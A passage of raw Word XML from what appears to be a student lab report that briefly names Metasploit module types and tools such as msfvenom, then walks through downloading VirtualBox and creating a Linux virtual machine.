          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00725829" w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> supporting modules like </w:t>
      </w:r>
      <w:r w:rsidR="00D875A0" w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploits, scanners, payloads, etc</w:t>
      </w:r>
      <w:r w:rsidR="00D875A0" w:rsidRPr="00D875A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D875A0" w:rsidRPr="00D875A0" w:rsidRDefault="00D875A0" w:rsidP="00D875A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D875A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D875A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset. We will cover msfvenom within this module, but pattern_create and pattern_offset are tools useful in exploit development which is beyond the scope of this module. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2D69" w:rsidRDefault="00725829" w:rsidP="00F50DF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725829">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00725829" w:rsidP="00F50DF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>virtual Box Download process:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="008F2D69" w:rsidP="00F50DF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">I download the latest version of virtual box from the virtual box website: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2D69" w:rsidRDefault="008F2D69" w:rsidP="00F50DF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 1:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> search on google search engine. Type “virtual box”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRPr="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00F50DF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F2D69" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pP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7C919926">
            <wp:extent cx="4151630" cy="186563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1630" cy="1865630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2D69" w:rsidRPr="00F50DF5" w:rsidRDefault="008F2D69" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D875A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step2:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> option just click “oracle vm virtual box” or via just click on the link </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F50DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.virtualbox.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> according to the version of your os windows, Mac or Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00611404" w:rsidRPr="00F50DF5" w:rsidRDefault="00611404" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If your running windows os, download the windows version the top by clicking “x86/amd64”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C45A6" w:rsidRDefault="005C45A6" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77A62E4C" wp14:editId="3D4B0642">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>621030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>3798570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3237230" cy="1919984"/>
            <wp:effectExtent l="0" t="0" r="127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07-10 at 13.12.0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7230" cy="1919984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C45A6" w:rsidRDefault="005C45A6" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00F50DF5" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00406B7A" w:rsidRDefault="00611404" w:rsidP="00725829">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00611404">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00611404">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The file initially will be in zip format,we need to extract it, after extracting the file open VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00611404">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F50DF5" w:rsidRDefault="00406B7A" w:rsidP="00F50DF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2324100" cy="18498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3336" cy="1865176"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00406B7A" w:rsidP="00F50DF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C45A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="005C45A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4:</w:t>
      </w:r>
      <w:r w:rsidR="00F50DF5" w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F50DF5" w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>click on the new option in the Virtual box.</w:t>
      </w:r>
      <w:r w:rsidR="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C45A6" w:rsidRDefault="00942D51" w:rsidP="005C45A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76127ADF" wp14:editId="3E00B546">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>483870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3273425" cy="1851660"/>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07-10 at 13.12.30.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3425" cy="1851660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA38D8A" wp14:editId="4079F5B9">
            <wp:extent cx="3422072" cy="1882140"/>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07-10 at 13.13.09.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9241" cy="1891583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Next window will pop up and you will be asked to provide some details like the name of your machine, installation path, type, and version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fill in the details like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Name: as per your choice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Path: leave as recommended</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Type: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Version: other (64-bit) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRPr="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00942D51" w:rsidRDefault="00942D51" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00942D51">
        <w:rPr>
